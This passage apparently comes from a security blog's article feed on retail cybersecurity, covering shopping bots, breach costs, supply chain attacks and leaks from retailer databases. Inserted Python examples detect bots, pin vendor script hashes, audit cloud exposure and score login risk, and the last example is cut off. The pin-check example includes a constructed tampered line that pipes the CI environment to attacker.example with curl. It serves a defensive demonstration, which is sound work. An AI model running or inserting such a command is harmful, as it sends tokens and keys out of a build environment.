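# Constructed sample: one stuffing client, one inventory-denial client,
# one scraper, one legitimate shopper and one malformed line.
SAMPLE_LOG = """\
203.0.113.5 - - [28/Oct/2021:14:00:01 +0000] "POST /api/login HTTP/1.1" 401 120 "-" "python-requests/2.26.0"
203.0.113.5 - - [28/Oct/2021:14:00:01 +0000] "POST /api/login HTTP/1.1" 401 120 "-" "python-requests/2.26.0"
203.0.113.5 - - [28/Oct/2021:14:00:02 +0000] "POST /api/login HTTP/1.1" 401 120 "-" "python-requests/2.26.0"
203.0.113.5 - - [28/Oct/2021:14:00:02 +0000] "POST /api/login HTTP/1.1" 401 120 "-" "python-requests/2.26.0"
203.0.113.5 - - [28/Oct/2021:14:00:03 +0000] "POST /api/login HTTP/1.1" 200 310 "-" "python-requests/2.26.0"
198.51.100.9 - - [28/Oct/2021:14:01:10 +0000] "POST /api/cart/add HTTP/1.1" 200 88 "https://shop.example/p/sku-77" "Mozilla/5.0 (X11; Linux x86_64)"
198.51.100.9 - - [28/Oct/2021:14:01:10 +0000] "POST /api/cart/add HTTP/1.1" 200 88 "https://shop.example/p/sku-77" "Mozilla/5.0 (X11; Linux x86_64)"
198.51.100.9 - - [28/Oct/2021:14:01:11 +0000] "POST /api/cart/add HTTP/1.1" 200 88 "https://shop.example/p/sku-77" "Mozilla/5.0 (X11; Linux x86_64)"
198.51.100.9 - - [28/Oct/2021:14:01:11 +0000] "POST /api/cart/add HTTP/1.1" 200 88 "https://shop.example/p/sku-77" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.77 - - [28/Oct/2021:14:02:00 +0000] "GET /api/products/101 HTTP/1.1" 200 2048 "-" "curl/7.79.1"
203.0.113.77 - - [28/Oct/2021:14:02:00 +0000] "GET /api/products/102 HTTP/1.1" 200 2048 "-" "curl/7.79.1"
203.0.113.77 - - [28/Oct/2021:14:02:00 +0000] "GET /api/products/103 HTTP/1.1" 200 2048 "-" "curl/7.79.1"
203.0.113.77 - - [28/Oct/2021:14:02:01 +0000] "GET /api/products/104 HTTP/1.1" 200 2048 "-" "curl/7.79.1"
203.0.113.77 - - [28/Oct/2021:14:02:01 +0000] "GET /api/products/105 HTTP/1.1" 200 2048 "-" "curl/7.79.1"
203.0.113.77 - - [28/Oct/2021:14:02:01 +0000] "GET /api/products/106 HTTP/1.1" 200 2048 "-" "curl/7.79.1"
192.0.2.44 - - [28/Oct/2021:14:03:30 +0000] "POST /api/login HTTP/1.1" 200 310 "https://shop.example/login" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
192.0.2.44 - - [28/Oct/2021:14:04:02 +0000] "POST /api/cart/add HTTP/1.1" 200 88 "https://shop.example/p/sku-12" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
192.0.2.44 - - [28/Oct/2021:14:05:45 +0000] "POST /api/checkout HTTP/1.1" 201 140 "https://shop.example/cart" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
this line is not in combined format and is skipped
"""

def is_browser_ua(ua):
    # Crude: real browsers start with "Mozilla/". Bots spoof this freely, so it
    # is one weak signal among several, never proof of a human.
    return ua.startswith("Mozilla/")

def detect_bots(log_text, failed_login_threshold=4, cart_add_threshold=4, scrape_threshold=6):
    """Return {ip: [tags]} for sources matching one or more bot signatures."""
    per_ip = defaultdict(lambda: {"failed_logins": 0, "cart_adds": 0,
                                  "checkouts": 0, "product_gets": 0, "uas": set()})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue              # skip malformed lines instead of aborting the run
        d = m.groupdict()
        s = per_ip[d["ip"]]
        s["uas"].add(d["ua"])
        if d["method"] == "POST" and d["path"] == "/api/login" and d["status"] == "401":
            s["failed_logins"] += 1
        elif d["method"] == "POST" and d["path"] == "/api/cart/add":
            s["cart_adds"] += 1
        elif d["method"] == "POST" and d["path"] == "/api/checkout":
            s["checkouts"] += 1
        elif d["method"] == "GET" and d["path"].startswith("/api/products/"):
            s["product_gets"] += 1

    findings = {}
    for ip, s in per_ip.items():
        tags = []
        if s["failed_logins"] >= failed_login_threshold:
            tags.append("credential_stuffing")
        if s["cart_adds"] >= cart_add_threshold and s["checkouts"] == 0:
            tags.append("inventory_denial")
        if s["product_gets"] >= scrape_threshold and not any(is_browser_ua(u) for u in s["uas"]):
            tags.append("scraping")
        if tags:
            findings[ip] = tags
    return findings

if __name__ == "__main__":
    for ip, tags in detect_bots(SAMPLE_LOG).items():
        print(ip, tags)
```

The inventory denial client deliberately carries a browser User-Agent: the behavioural signal (many reservations, no purchase) is what gives it away, which is why detection should lean on what a session does rather than on what it claims to be.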

Keeping Ahead of Shopping Bots

Shopping bots can harm a business by tarnishing its brand image, crashing websites, increasing support costs, jeopardizing deals, severing connections with customers and skewing the data behind crucial decisions. Besides, the data these bots gather is itself valuable, and the adversaries behind them can exploit it for profit.

This is another reason retailers should be sure to adopt the right cybersecurity measures. Stay updated on how threat actors work and how they can use these bots to infiltrate your information assets.

The post How Shopping Bots Can Compromise Retail Cybersecurity appeared first on Security Intelligence.

Cost of a Data Breach: Retail Costs, Risks and More To Know https://securityintelligence.com/articles/cost-of-a-retail-data-breach/ Wed, 27 Oct 2021 13:00:00 +0000 https://securityintelligence.com/?p=432245

E-commerce sales grew by nearly one-third in 2020, in large part due to the pandemic. Meanwhile, retail data breaches grew even more prevalent and costly. Retailers need to know not just the cost of a data breach, but the risks and challenges involved with one. This can help IT security professionals and business owners protect against attacks. It also helps to look at some of the more infamous data breaches of the past year. Be prepared by knowing what threats to protect against.

What Is a Retail Data Breach?

A retail data breach involves attackers stealing customer data. That can include credit card numbers, names, addresses and, in the case of e-commerce data breaches, even passwords. It can also involve attackers gaining access to company data or accounts, which increases the cost of a data breach.

There are several types of retail data breaches, including:

  • Skimming at the point of sale, where thieves steal credit card information and use it to make unauthorized purchases
  • Phishing, where threat actors use social engineering to trick people into giving up passwords or bank account numbers
  • Malware, or software that can steal or wipe data
  • Ransomware, or software that holds data hostage until the victim pays a fee.

Well-Known 2021 Data Breaches

A popular men’s clothing retailer, with both e-commerce and brick-and-mortar locations, suffered a devastating breach earlier this year, with customer data — including partial credit card information — stolen from millions of customers. The data was posted on a hacker forum after it was downloaded from the company’s backup cloud.

High-End Fashion Retailer Data Breach

Another high-end fashion retailer selling men’s, women’s and children’s clothing revealed a data breach in July. It included account numbers, debit and credit card numbers and other personal and financial information.

The retailer offered customers involved in the breach one year of free credit monitoring and identity theft protection services.

Big-Box Chain Store Data Breach

When many people think of shopping today, they think of big box stores. These chains face the same challenges as other retailers in protecting customer data. In spring 2021, one big-box store suffered a cloud storage bucket misconfiguration. This led to more than 300,000 customers having their data stolen.

The information exposed in the breach included names, phone numbers, addresses and the last four digits of credit and debit cards.

Children’s Clothing Retailer

Attackers stole personal and shipping information from more than 410,000 people in one June 2021 attack. Specifically, they struck online shoppers in a third-party data breach. Data included names, addresses, phone numbers, purchase details and more.

Grocery Store Chain

Several supermarket chains suffered data breaches in 2021. One in particular exposed cloud-based databases bearing customer information to the general public. Data may have included personal information, email addresses and passwords to loyalty club accounts. The company said the passwords were hashed and not visible in the data breach.

Auto Manufacturer and Dealer

Retail data breaches aren’t limited to places people may shop on a weekly basis. An auto manufacturer experienced a data breach in 2021 that affected 3.3 million car buyers and shoppers across the U.S. and Canada.

The breach affected the automaker's website as well as some of its dealers, exposing consumer information that had been collected for sales and marketing between 2014 and 2019. Data exposed included driver's license numbers for more than 90,000 people, which could open those customers to identity theft. A smaller number of customers had their Social Security or tax ID numbers stolen, along with their dates of birth.

However, 97% of those involved in the breach had only their contact information and vehicle data — including the Vehicle Identification Number, in some cases — taken.

How Much Does a Retail Data Breach Cost?

The good news is that, in spite of their prevalence, retail data breaches are not anywhere close to the most costly. The average cost of a data breach in retail in 2021 is $3.27 million. Retail ranks 15th on the list of most costly data breaches. However, the cost jumped steeply from 2020, when each breach cost an average of only $2.01 million, according to the 2021 Cost of a Data Breach Report. That represents a 62.7% increase, which was the fourth-highest increase, percentage-wise, out of the 17 industries analyzed in the report.

It’s important to remember that the costs of a data breach include not just money that may be stolen from the company or its customers, but also the costs of:

  • Compensating customers with credit monitoring and identity monitoring services or cash
  • Litigation if a class-action suit occurs
  • Fixing the breach and preventing future breaches.

Plus, there’s the high — and often unmeasurable — cost of lost consumer confidence that can damage your company’s reputation and result in lost sales.

The Cost of a Data Breach Report indicated that lost business held the lion’s share of data breach costs, representing 38% of the total costs of a data breach across industries. In a field like retail, that number may be higher than the average since a company’s reputation — and therefore, sales — relies heavily on keeping customer data safe.

What Are the Risks and Challenges of Data Security in the Retail Industry?

The massive spike in e-commerce sales in the past year created additional challenges for shopping websites to keep customer data safe. In addition, the retail industry faces many challenges in preventing data breaches.

First, stores must be vigilant about security across all fronts, from protecting data at the point of sale to protecting the servers where customer data is stored.

Store owners can mitigate risk by ensuring they use the latest in point of sale technology, including accepting EMV chip cards and mobile wallet payments. Companies should also deploy the latest tools online, including artificial intelligence and the zero trust model of IT security, to protect information at every level — from corporate headquarters to storefronts and, especially, on their e-commerce sites. That way, you can worry less about the cost of a data breach.

The post Cost of a Data Breach: Retail Costs, Risks and More To Know appeared first on Security Intelligence.

Roundup: Customer Data and Retail Security in the News https://securityintelligence.com/articles/roundup-customer-data-retail-security/ Thu, 14 Oct 2021 13:00:00 +0000 https://securityintelligence.com/?p=432012

More people are shopping online than ever before due to the pandemic. Therefore, businesses have had to take extra steps to protect customer data, combat fraud and implement the latest in online safety. In 2020, e-commerce's share of retail sales jumped from 16% to 19%, according to UNCTAD, the United Nations trade and development body.

In the U.S., online retail sales jumped 32.4% year-over-year in 2020. The trend continued with a 39% increase in Q1 2021. Reports from IBM’s U.S. Retail Index showed the pandemic sped up the shift away from brick-and-mortar stores by five years. Consumers began to shop for items from school supplies to clothing online.

Retailers are working harder than ever to protect consumers’ data. However, this doesn’t mean they should let up at the point of sale (POS), either.

Check out our tips to help e-commerce and brick-and-mortar retailers protect customer data and their own financial interests from retail cyber attacks. After all, it’s good for businesses to prepare for challenges in the years ahead.

Briefs and Top Insights


The Shift to E-Commerce: How Retail Cybersecurity Is Changing 

Knowing the threats related to e-commerce security and customer data can help you combat malware and ransomware attacks. It also keeps you aware of data breaches that can threaten your customers’ personally identifiable information and money. BDO International found 57% of retail business owners said that bolstering retail cybersecurity ranked in their top three short-term business goals. However, only about 40% listed it in long-term business goals. Taking a far-sighted approach to digital safety, which includes choosing the right platform for your business, can help you stay ahead of attackers.

Other customer data best practices include:

  • Segment your network so that customer data sits in its own isolated zone
  • Install the right malware detection solution across your network, without neglecting POS security
  • Invest in threat intelligence systems.


Retail Cybersecurity: How to Protect Your Customer Data 

Personalization through artificial intelligence leads to better customer experiences online and more relevant product recommendations. However, increased amounts of customer data also lead to more for attackers to steal in a retail data breach.

To best protect crucial information, first sort the data you hold into categories. Next, determine where each category physically lives and the best ways to secure it. Deloitte divides customer data into four types:

  • Account, including customer name and address
  • Location, including geographic data and IP addresses
  • Browser data, including the customer’s history
  • Profile, demographics and social media data collected from third-party sites.

Once you’ve found and sorted the different types of data, you can take the following steps to protect it, online and off:

  • Encrypt data, both from online and brick-and-mortar sales
  • Ensure your POS system is updated, including enabling chip and PIN and digital wallet sales
  • Train employees on the importance of securing passwords, not connecting their own mobile devices to your store’s network and how to spot an attack in progress.


CISO of Major UK Retailer Weighs In on Enterprise IoT Security 

Threats in the retail industry extend beyond customer data security online and in POS transactions. Simon Langley, CISO of UK grocery retailer Morrisons, discussed some of the threats facing businesses adopting Internet of Things (IoT) devices. Reports say that growing numbers of businesses will face attacks that come through the IoT, including through employees’ own digital assistants and other IoT devices.

AI and machine learning stand as possible ways to combat the threat, along with increased efforts to detect anomalies and unmanaged devices on the network. Proactive risk management of IoT devices can help chief information security officers (CISOs) not just combat IoT attacks but also innovate new ways to protect against any security risks in the retail environment.

More on Customer Data Security From Around the Web

2020 Sees Huge Increase in Records Exposed in Data Breaches

Although the number of data breaches in 2020 dropped by nearly half (48%), they exposed more than 37 billion records, spotlighting a need for enhanced cybersecurity measures as more consumers shop online.

Nearly Half of Retailers Hit by Ransomware in 2020

Ransomware attacks may not be the most costly of customer data security threats, but they are on the rise, especially in the retail sector.

COVID-19’s Impact on the Future of IT Budgets

IT spending in the retail sector could drop by as much as 15% in the aftermath of the global pandemic. CISOs will need to spend smartly and do more with less.

The post Roundup: Customer Data and Retail Security in the News appeared first on Security Intelligence.

Supply Chain Attack: What It Is (and What to Do About It) https://securityintelligence.com/articles/supply-chain-attack-what-it-is-what-to-do/ Tue, 28 Sep 2021 19:00:00 +0000 https://securityintelligence.com/?p=431602

The past two years have delivered major disruptions for supply chains. The pandemic pushed supply chain attack issues front-and-center, with disruptions up 67% in 2020 and problems expected to persist as global markets adjust to ‘new normal’ operations.

Increasing reliance on digital supply solutions, however, has also set the stage for increasing supply chain attacks. These attacks are expected to increase four-fold in 2021.

Here’s what enterprises need to know about supply chain threats. Check out the current state of supply chain security, plus what steps you can take to reduce total risk.

What Is a Supply Chain Attack?

A supply chain attack occurs when threat actors compromise enterprise networks using connected applications or services owned or used by outside partners, such as suppliers. Sometimes, experts also refer to these as third-party or value-chain attacks.

For threat actors, the appeal of supply chain attacks is trust. Applications and services used by enterprises have usually been vetted by security teams, so they often have access to sensitive or valuable internal data. If attackers can move laterally from a connected supply chain app into the larger enterprise network, they can steal, encrypt or destroy critical data and cost companies millions in both repair costs and reputation damage.

As networks grow, this problem compounds. Third-party suppliers are often using software from other business partners, who in turn have their own outside app connections. Therefore, a supply chain attack may start several companies removed from the intended target, making it harder to spot.

A successful supply chain attack can be a major blow. When networking tools supplier SolarWinds was compromised in late 2020, as many as 18,000 customers installed the trojanized Orion update.

The State of Supply Chain Cybersecurity in 2021

As noted above, supply chain attacks are expected to increase in 2021. Part of this expansion comes from increased application environment complexity: companies embrace the need for agile and adaptable supply chains that are resistant to future disruptions. Broadening the number of connected apps and services helps enterprises navigate changing market conditions, but it also creates a larger attack surface for threat actors. If a vulnerability does crop up, that larger surface makes it harder to find and remove supply chain threats before they become bigger issues.

Notable 2021 Supply Chain Attacks

Supply chain attacks are off to a strong start in 2021. For example, in April 2021 DevOps tool provider Codecov disclosed that its Bash script uploader had been compromised by malicious actors. This allowed the attackers to capture information stored by Codecov customers in continuous integration (CI) environments. Third-party investigators also found that attackers might have been able to "raid additional resources" and gain access to user credentials, which could, in turn, lead to even larger breaches.

In July 2021, the REvil gang compromised Kaseya's VSA remote monitoring and management software and used it to spread ransomware to Kaseya's customers. According to NPR, more than 200 U.S. companies found their networks paralyzed by ransomware after the Kaseya compromise.

Worth noting? Recent research from the European Union Agency for Cybersecurity found that 66% of attacks focused on supplier code. This meant even strong internal defenses may not be enough to mitigate the impact of supply chain attacks.

Common Supply Chain Attack Methods

The goal of supply chain attackers is to compromise trusted services. From there, they can gain access to more valuable corporate resources. One common compromise approach is phishing. Successful phishing attacks can reveal account and password data, in turn allowing attackers to examine source code without triggering network defenses. Malware is also commonly used to infiltrate networks and exfiltrate key source code, which attackers can then modify and re-insert.

Some of the most common supply chain threat vectors include:

  • Third-party software providers
  • Data storage solutions
  • Development or testing platforms
  • Website building services.

In each case, these software solutions and services require access to critical aspects of enterprise infrastructure. That opens up a potential pathway for malicious actors.

Best Practices for Supply Chain Security

When it comes to supply chain attacks, attackers are always looking for the weakest link. As a result, even robust enterprise defenses may not be enough to protect key assets. After all, the trusted nature of these third-party apps means they’re often not subject to the same scrutiny. This creates an opening for attackers: If they go far enough back along the supply chain, chances are they’ll find a vulnerability they can exploit and start moving upward toward critical apps.

To help reduce the risk of supply chain threats, security best practices are critical. These include:

1) Assessing current strategies – Better supply chain security starts with current strategies: Are they effective at mitigating supply chain threats? Do they align with compliance requirements? Can they adapt to evolving risk realities?

2) Testing, testing, testing – Regular penetration testing and vulnerability scans can help identify potential supply chain security weak points. From there, you can close down potential compromise pathways.

3) Identification and encryption – By identifying and encrypting highly sensitive data in their environment, enterprises can reduce the reach of supply chain attacks that do occur. Even if malicious actors gain access, they won’t be able to leverage protected assets.

4) Third-party risk management – The supply chain software landscape is more complex today than ever before. Therefore, companies must conduct an in-depth analysis of supplier security practices. They need to break down internal operational silos to ensure all departments are on the same page when it comes to protection.

5) Zero trust frameworks – By moving to a 'never trust, always verify' framework, enterprises can create a functional front line of defense. Zero trust requires even familiar apps and services to pass authentication checks before gaining network access.
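The Codecov incident above is the textbook case for one concrete control that belongs under "testing" and "third-party risk management": never let a downloaded vendor script run until its digest matches a value you reviewed and committed yourself. The following is an added example (not code from the original article, from Codecov or from any vendor) of that gate, including a parser for the `sha256sum` file format many vendors publish. The script bodies, the file name and the tampered line are constructed.

```python
# Added example (not from the original article): verify a downloaded vendor
# script against a SHA-256 pin committed in your own repository before anything
# executes it, and parse the `sha256sum` file format most vendors publish. The
# script bodies, file names and the tampering are constructed for illustration.
import hashlib
import hmac

def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()

def parse_sha256sums(text):
    """Parse '<hex>  <name>' lines as written by `sha256sum`; '*' marks binary mode."""
    pins = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        if len(parts) != 2 or len(parts[0]) != 64:
            raise ValueError(f"malformed pin line: {raw!r}")
        pins[parts[1].lstrip("*")] = parts[0].lower()
    return pins

def verify(name, data, pins):
    """Return 'ok', 'mismatch' or 'unpinned'. Unpinned is a failure too: a file
    the reviewer never saw must not run just because no pin exists for it."""
    pinned = pins.get(name)
    if pinned is None:
        return "unpinned"
    if hmac.compare_digest(sha256_hex(data), pinned):
        return "ok"
    return "mismatch"

def run_if_verified(name, data, pins, runner):
    """Gate execution on the pin check; `runner` is only called on 'ok'."""
    verdict = verify(name, data, pins)
    if verdict != "ok":
        return verdict, None
    return verdict, runner(data)

def dry_run(script):
    # Stand-in for handing the script to the shell: returns its command lines.
    return [l for l in script.decode().splitlines() if l and not l.startswith("#")]

# Constructed: the uploader script as reviewed and pinned by the team.
TRUSTED_SCRIPT = (b"#!/bin/bash\nset -euo pipefail\n"
                  b"curl -sS https://upload.example/report -F file=@coverage.xml\n")
# Constructed: the same script after an attacker appended one line that ships
# the CI job's environment (tokens, cloud keys) to a host they control.
TAMPERED_SCRIPT = TRUSTED_SCRIPT + b"env | curl -sS -X POST --data-binary @- https://attacker.example/c\n"

# The pin file lives in *your* repository, written when a reviewer inspected the
# script. It is computed here only to keep the example self-contained; in
# practice it is a literal. A digest fetched from the same server as the script
# proves nothing, because whoever can alter one can alter both.
PINS = parse_sha256sums(f"{sha256_hex(TRUSTED_SCRIPT)}  uploader.sh\n")

if __name__ == "__main__":
    print(run_if_verified("uploader.sh", TRUSTED_SCRIPT, PINS, dry_run))    # ('ok', [...])
    print(run_if_verified("uploader.sh", TAMPERED_SCRIPT, PINS, dry_run))   # ('mismatch', None)
```

The same gate generalizes to container base images, compiled dependencies and installer binaries: pin the digest, fetch, compare, and only then execute or deploy.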

The right security tools also play a role in reducing supply chain attack risk. Here, enterprises are often best-served by solutions that leverage blockchain for secure transactions, artificial intelligence for improved threat detection and cloud-based threat analysis for rapid risk assessment.

Solving for Supply Chain Attacks

Bottom line? It all comes down to trust.

Supply chain applications are necessary for enterprises to deliver services at scale. However, the same trust that reduces complexity also increases total risk. To mitigate the impact of supply chain attacks, enterprises must take control of third-party connections using both tools and tactics designed to detect unexpected actions, discover malicious code and deny access to potential threats.

The post Supply Chain Attack: What It Is (and What to Do About It) appeared first on Security Intelligence.

What’s Behind the Leaks of Customer Data From Retailer Databases? https://securityintelligence.com/articles/behind-leaks-customer-data-retailer-databases/ Mon, 13 Sep 2021 13:00:00 +0000 https://securityintelligence.com/?p=431230

Retail data breaches involving customer data happen often today. However, they tend to be smaller in size than health care, finance or government breaches. So, the general public notices them less. Yet, they happen more often than realized. Why? And how can you defend against them?

Human Error in Customer Data Theft

All types of retail outlets could fall prey to data leaks, and not all breaches come from bad intent. For example, CVS Health data could be a gold mine because of the mix of health, financial and insurance records. However, the drugstore chain’s recent breach of more than 1 billion records appears to be caused by human error. The records, according to ThreatPost, “were left in the database of a third-party, unnamed vendor – exposed, unprotected, online,” likely because of a cloud misconfiguration that left the data vulnerable.

Wegmans Food Markets is a grocery chain, but its customer data is just as attractive to attackers as a drugstore’s. Another cloud database misconfiguration left the personally identifiable information (PII) of its Shoppers Club members, and of anyone with a Wegmans.com account, open to potential compromise. Kroger suffered a similar style of data leak, though in its case the exposed data was human resources records rather than customer data.
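The CVS, Wegmans and Kroger incidents share one root cause: a datastore that was configured so that anyone on the internet could reach it. That is a condition you can test for mechanically. The audit below is an added example, not code from the original article or from any of the retailers or vendors named; it reads a constructed, vendor-neutral configuration snapshot (loosely modeled on the shape of object-storage bucket policies and security-group ingress rules, not any provider’s real schema) and flags buckets readable by a wildcard principal and database ports reachable from 0.0.0.0/0 or ::/0. The port list and action names are assumptions.

```python
"""Flag cloud configuration that leaves a datastore open to the internet.

Added example, not from the original article. The snapshot format below
is constructed and vendor-neutral, loosely modeled on the shape of
object-storage bucket policies and security-group ingress rules; it is
not any provider's real API or exact schema.
"""
import ipaddress

# Ports of common databases and caches (assumption; extend for your estate).
DATASTORE_PORTS = {
    1433: "mssql", 1521: "oracle", 3306: "mysql", 5432: "postgres",
    6379: "redis", 9200: "elasticsearch", 27017: "mongodb",
}
# Actions that let a caller read object data or enumerate it (assumed names).
READ_ACTIONS = {"storage:GetObject", "storage:ListBucket", "storage:*", "*"}


def principal_is_public(principal) -> bool:
    """True when the statement applies to anyone, not a named identity."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        for value in principal.values():
            values = value if isinstance(value, list) else [value]
            if "*" in values:
                return True
    return False


def cidr_is_world_open(cidr: str) -> bool:
    """True for 0.0.0.0/0 and ::/0, the ranges that mean 'everyone'."""
    return ipaddress.ip_network(cidr, strict=False).prefixlen == 0


def audit_snapshot(snapshot: dict) -> list:
    """Return (severity, resource, detail) findings for public exposure."""
    findings = []
    for bucket in snapshot.get("buckets", []):
        for stmt in bucket.get("policy", {}).get("Statement", []):
            if stmt.get("Effect") != "Allow" or not principal_is_public(stmt.get("Principal")):
                continue
            actions = stmt.get("Action", [])
            actions = [actions] if isinstance(actions, str) else actions
            exposed = sorted(a for a in actions if a in READ_ACTIONS)
            if exposed:
                findings.append(("HIGH", bucket["name"],
                                 "anonymous callers may " + ", ".join(exposed)))
    for group in snapshot.get("security_groups", []):
        for rule in group.get("ingress", []):
            if not cidr_is_world_open(rule["cidr"]):
                continue
            lo, hi = rule.get("from_port", 0), rule.get("to_port", 65535)
            hit = [f"{name}/{port}" for port, name in sorted(DATASTORE_PORTS.items())
                   if lo <= port <= hi]
            if hit:
                findings.append(("CRITICAL", group["name"],
                                 f"{rule['cidr']} may reach " + ", ".join(hit)))
    return findings


# Constructed snapshot: one bucket and one security group are misconfigured.
SAMPLE_SNAPSHOT = {
    "buckets": [
        {"name": "loyalty-exports", "policy": {"Statement": [
            {"Effect": "Allow", "Principal": "*",
             "Action": ["storage:GetObject", "storage:ListBucket"], "Resource": "*"}]}},
        {"name": "loyalty-exports-private", "policy": {"Statement": [
            {"Effect": "Allow", "Principal": {"Service": "analytics-role"},
             "Action": "storage:GetObject", "Resource": "*"}]}},
    ],
    "security_groups": [
        {"name": "sg-customer-db", "ingress": [
            {"cidr": "0.0.0.0/0", "from_port": 27017, "to_port": 27017}]},
        {"name": "sg-orders-db", "ingress": [
            {"cidr": "10.0.0.0/8", "from_port": 5432, "to_port": 5432}]},
    ],
}

if __name__ == "__main__":
    for sev, res, detail in audit_snapshot(SAMPLE_SNAPSHOT):
        print(f"{sev:8} {res}: {detail}")
```

Run against the sample, the audit reports the publicly readable bucket and the MongoDB port open to the world, and stays quiet about the bucket restricted to a named role and the Postgres port reachable only from a private range. A real deployment would feed it the exported configuration of every account, on a schedule, so that a single slip in a vendor’s console does not stay unnoticed until a researcher finds the database.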

Outside Attackers

The retail industry is not immune to ransomware. In fact, ransomware attacks on retailers soared during the pandemic, rising 1,280% between the start and the end of 2020. Fashion retailer Guess suffered a ransomware attack in February 2021 that exposed customers’ sensitive information, but the company did not disclose it until the summer. The REvil gang held a Swedish grocery chain’s data to ransom for $70 million. Bose also disclosed a breach this year in which ransomware attackers accessed the PII of current and former employees.

Third-party data breaches also threaten retailers. Baby and children’s clothing retailer Carter’s leaked customer data because of poor security around shortened URLs used by one of its vendors. And the most infamous retail data breach of all, the Target breach, was the result of a third-party compromise that reached the company’s point-of-sale devices and software.
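A shortened URL is only as safe as the identifier behind it: if the identifier is short or sequential, anyone can enumerate the neighbouring values, and if the link never expires, a copy that leaks from an inbox or a browser history works forever. The snippet below is an added example, not code from the original article or from the vendor involved; it shows the shape of a link token that bounds both problems by carrying the order id, an expiry time and an HMAC over both, so a forged or edited link fails verification and a genuine one stops working after its TTL. The key is generated per process here and is an assumption; a real service would load it from a secrets manager.

```python
"""Expiring, tamper-evident order links instead of bare shortened URLs.

Added example, not from the original article or the vendor involved.
Each link token is 'order_id|expiry|hex_mac', where the MAC covers the
order id and expiry together. LINK_KEY is generated per process here;
in practice it comes from a secret store (assumption).
"""
import hashlib
import hmac
import secrets
import time

LINK_KEY = secrets.token_bytes(32)  # assumption: loaded from a secret store in real deployments


def make_link_token(order_id: str, ttl_seconds: int, now=None, key=LINK_KEY) -> str:
    """Return a token for order_id that verifies for the next ttl_seconds."""
    now = int(time.time()) if now is None else int(now)
    expiry = now + ttl_seconds
    payload = f"{order_id}|{expiry}".encode()
    mac = hmac.new(key, payload, hashlib.sha256).hexdigest()
    return f"{order_id}|{expiry}|{mac}"


def verify_link_token(token: str, now=None, key=LINK_KEY):
    """Return the order id if the token is authentic and unexpired, else None.

    The MAC is checked before the expiry is trusted: until it verifies,
    every field in the token is attacker-controlled.
    """
    now = int(time.time()) if now is None else int(now)
    parts = token.rsplit("|", 2)
    if len(parts) != 3:
        return None
    order_id, expiry_str, mac_hex = parts
    try:
        supplied = bytes.fromhex(mac_hex)
        expiry = int(expiry_str)
    except ValueError:
        return None
    # Recompute over the exact strings that were signed, not a normalised form.
    payload = f"{order_id}|{expiry_str}".encode()
    expected = hmac.new(key, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(supplied, expected):
        return None
    if now > expiry:
        return None
    return order_id


if __name__ == "__main__":
    issued_at = 1_700_000_000  # constructed clock value
    token = make_link_token("ORD-1001", 900, now=issued_at)
    print("fresh:   ", verify_link_token(token, now=issued_at + 100))
    print("expired: ", verify_link_token(token, now=issued_at + 901))
    print("tampered:", verify_link_token(token.replace("ORD-1001", "ORD-1002"), now=issued_at + 100))
```

The token still behaves as a bearer credential, so the expiry is what limits the damage when a link is forwarded or scraped; the separator has to be URL-encoded (or swapped for a URL-safe character) before the token is embedded in a link, and the verifier must never fall back to looking up the order by id alone when the MAC fails.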

Protecting Customer Data

Given the many ways attackers leak and steal data, and the fines and financial damage that follow, every retail company should make keeping data safe a top priority.

Some basic measures apply across industries:

  • Encrypt sensitive data, both customers’ and employees’
  • Upgrade and strengthen malware protection
  • Restrict access across the cloud to reduce the risk, and the blast radius, of a misconfiguration
  • Train employees better, and publish security awareness tips for customers on the company website to help prevent mistakes that put their data at risk
  • Consider a Consumer Identity and Access Management (CIAM) platform for better management of customer data and identities

How CIAM Works

Managing data and tracking the identities attached to it is hard enough when only insider information is involved. Organizations with employees and contractors are the natural home of identity and access management (IAM) systems. Adding customer data and other external identities adds another layer. CIAM gives customers some control over their personal data, starting at registration and continuing throughout the customer/retailer life cycle. It can track customer behavior and risk profiles and respond to potential risk through functions such as access requests or location detection, for instance by asking for a second factor when a login arrives from an unfamiliar device or country. IAM offers security and privacy checks for static identities; CIAM offers the same for identities that are always shifting.
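The behaviour tracking and location detection described above come down to scoring each login against what the platform already knows about that customer and choosing between letting it through, demanding a second factor, and refusing it. The code below is an added example, not code from the original article or from any CIAM product; the event fields, weights and thresholds are assumptions chosen for illustration, and the login history at the bottom is constructed. It goes slightly beyond the text by also counting recent refusals, which is how the same logic covers credential-stuffing bursts.

```python
"""Risk-based step-up for customer logins, in the spirit of the CIAM
functions described above (behaviour tracking, location detection).

Added example, not code from the original article or any CIAM product.
Weights, thresholds and event fields are assumptions; the events are
constructed.
"""
from dataclasses import dataclass, field
from typing import Optional

ONE_HOUR = 3600
STEP_UP_AT = 30   # assumption: scores >= 30 need a second factor
DENY_AT = 90      # assumption: scores >= 90 are refused outright


@dataclass
class LoginEvent:
    user: str
    ts: int          # unix seconds
    country: str     # from IP geolocation (assumed already resolved)
    device_id: str   # stable device/browser fingerprint


@dataclass
class CustomerProfile:
    known_devices: set = field(default_factory=set)
    last_country: Optional[str] = None
    last_ts: Optional[int] = None
    recent_denials: int = 0


def score_login(profile: CustomerProfile, ev: LoginEvent):
    """Return (score, reasons) for one login attempt against the stored profile."""
    score, reasons = 0, []
    if ev.device_id not in profile.known_devices:
        score += 30
        reasons.append("unrecognised device")
    if profile.last_country is not None and ev.country != profile.last_country:
        score += 30
        reasons.append(f"country changed {profile.last_country}->{ev.country}")
        # Two countries inside an hour is not plausible travel for one person.
        if profile.last_ts is not None and ev.ts - profile.last_ts < ONE_HOUR:
            score += 40
            reasons.append("implausible travel time")
    if profile.recent_denials >= 3:
        score += 20
        reasons.append("repeated recent denials")
    return score, reasons


def decide(profile: CustomerProfile, ev: LoginEvent) -> str:
    """Map the risk score to allow / step_up / deny and update the profile."""
    score, _reasons = score_login(profile, ev)
    if score >= DENY_AT:
        profile.recent_denials += 1
        return "deny"
    # For the demo, allow and step_up both count as a successful session;
    # a real flow updates the profile only after the challenge is passed.
    profile.known_devices.add(ev.device_id)
    profile.last_country, profile.last_ts = ev.country, ev.ts
    return "step_up" if score >= STEP_UP_AT else "allow"


# Constructed login history for one customer.
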